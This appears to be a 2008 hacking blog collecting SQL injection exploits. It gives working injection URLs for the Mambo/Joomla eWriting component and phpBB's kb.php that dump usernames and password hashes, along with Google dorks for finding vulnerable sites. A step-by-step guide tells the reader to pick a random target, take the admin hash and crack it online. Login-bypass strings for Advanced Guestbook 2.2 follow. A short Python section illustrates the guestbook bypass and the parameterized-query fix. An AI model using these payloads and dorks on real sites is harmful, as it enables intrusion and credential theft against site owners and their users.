Sunday, March 16, 2008

Mambo Component eWriting 1.2.1 (cat) SQL Injection

eWriting 1.2.1 - SQL injection


Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"

Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--

Mambo
/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--

All credit goes to the original author

Source: http://hacking.isgreat.org/community/showthread.php?t=1015

Note: This is for educational purposes only, don't cause harm to anyone using this exploit

Enjoy!

Saturday, March 15, 2008

Phpbb hacking with pictures

I already posted a step-by-step video for this hack.
The video is located at http://rapidshare.com/files/99460220/phpbb-Sql-Injection.rar.html
Well, let's get back to work.
What we need for this hack to work:
1. A PC with an internet connection
2. Our friend (Google)
3. The SQL injection code
4. And finally the target.

Let's do it step by step:

Open up Google and type "Modified by Fully Modded" in the search bar.
It will give many results; select any one randomly.

This is what you will most likely get after you search for the above string.


Just have a look at the target

Now that we have the target, it's time to inject it.
For the injection we use the following string:

[code]http://site.com/forum/kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1[/code]

Now, in the above string, replace [site.com/forum/] with your target site and forum path.

Hit enter and wait for the page to load fully



This SQL injection will give you the admin's username along with the hash.
Now you need to break the hash in order to log in as admin.

To break the hash use
http://www.milw0rm.com/cracker/insert.php

Enter the hash there and click on submit, and it will give you the password.

All credit goes to the original author

Source: http://hacking.isgreat.org/community/showthread.php?t=1015

Note: This is for educational purposes only, don't cause harm to anyone using this exploit

Enjoy!

Friday, February 8, 2008

advanced guestbook vulnerability

It's not a new vulnerability in "Advanced Guestbook",
but I am posting it here because still no patch is issued for fixing it.

As per Bugtraq:
It has been reported that Advanced Guestbook is prone to a SQL injection vulnerability that could allow an attacker to gain administrative access to the application.

This issue is reported to exist in Advanced Guestbook 2.2, however, it is possible that other versions are affected as well.

The following proof of concept exploits have been provided:

JQ explains that it is possible to trigger this issue by leaving the username entry blank and entering the following string in the password field:

') OR ('a' = 'a

Spy Hat comments that it is also possible to leverage this issue by leaving the password field blank and entering the following string into the username field:

? or 1=1 --

For laymen:

In simple terms, Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access.
Proof of concept can be found by googling for "intitle:guestbook "advanced guestbook 2.2 powered""

This Google query shows results for websites with "Advanced Guestbook v2.2" installed. An attacker can select any of the results and use this SQL injection to gain unauthorized access.

It is strongly recommended to change the name/location of www.example.com/guestbook/admin.php.
Also, this vulnerability is reportedly fixed in version 2.3.1.
Update your version immediately if you are still running the old version.
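
Why the password-field string quoted above gets past a login check, and what the code-level fix looks like, shown as an added example (not Advanced Guestbook's own code). The table name, the query shape and the PASSWORD() stand-in are assumptions, and the account is constructed sample data.

```python
import hashlib
import sqlite3


def _password(p):
    # Assumption: stand-in for a SQL-side hash function such as MySQL's PASSWORD().
    return hashlib.sha256(p.encode()).hexdigest()


def make_db():
    # Constructed sample data: one admin account in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.create_function("PASSWORD", 1, _password)
    db.execute("CREATE TABLE auth (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO auth (username, password) VALUES (?, PASSWORD(?))",
               ("admin", "correct horse"))
    return db


def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text, so quotes in it change the query's structure.
    sql = ("SELECT username FROM auth WHERE username = '%s' "
           "AND password = PASSWORD('%s')" % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    # Placeholders pass the input as data only; it is never parsed as SQL.
    sql = "SELECT username FROM auth WHERE username = ? AND password = PASSWORD(?)"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Password-field string quoted in the post; the username is left blank.
PAYLOAD = "') OR ('a' = 'a"

if __name__ == "__main__":
    db = make_db()
    # Concatenated query becomes: ... password = PASSWORD('') OR ('a' = 'a')
    print("concatenated :", login_vulnerable(db, "", PAYLOAD))
    print("parameterized:", login_parameterized(db, "", PAYLOAD))
    print("valid login  :", login_parameterized(db, "admin", "correct horse"))
```

Because AND binds tighter than OR, the trailing `OR ('a' = 'a')` makes the WHERE clause true for every row, so the concatenated version returns the first account without any password check.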

My First Post

Hi,

This is my first post on "Latest Exploits and Vulnerabilities"
I named this blog while keeping in mind the meaning of the words used.
I will try to update this blog with the latest exploits and vulnerabilities.

If you like the content of this blog, you can also visit my website located at:

http://hacking.isgreat.org

Thank you for visiting this blog.